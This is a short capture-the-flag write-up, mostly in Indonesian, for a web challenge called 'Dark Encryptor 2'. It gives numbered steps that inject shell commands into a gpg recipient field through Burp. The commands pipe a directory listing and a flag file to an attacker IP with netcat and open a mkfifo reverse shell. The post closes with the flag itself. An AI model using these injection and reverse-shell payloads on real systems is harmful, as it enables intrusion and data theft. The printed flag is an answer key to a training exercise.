DARK ENCRYPTOR 2

After exploring their internal network, we have found another encryption tool. Can you hack the server and extract confidential data? Our intel tells us that the application uses the gpg tool.

Category: Web || Level: Medium

📌 Langkah Penyelesaian

Upload file txt
Open burp
- Aktifkan intercept
Klik Encrypt & Download
Di burp: send request to repeater

*Edit request di bagian recipient

1. Setelah tanda (;) tambahkan $(ls | nc <IP_ATTACKER> <PORT>)

2. Aktifkan listener di host machine, kemudian send request burp

setelah berhasil

3. OPTIONAL: ubah menjadi: $(cat flag.txt | nc <IP_ATTACKER> <PORT>)

4. LAIN: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP_ATTACKER> <PORT> >/tmp/f

Final Flag🎯

Ouput Pesan yang didekripsi:

THM{going_in_bl1nd_2394}

Kesimpulan

Karena saya tidak sempat Screenshot, jadi saya hanya berikan langkah-langkah penyelesaian yang saya gunakan

Google Sites

Report abuse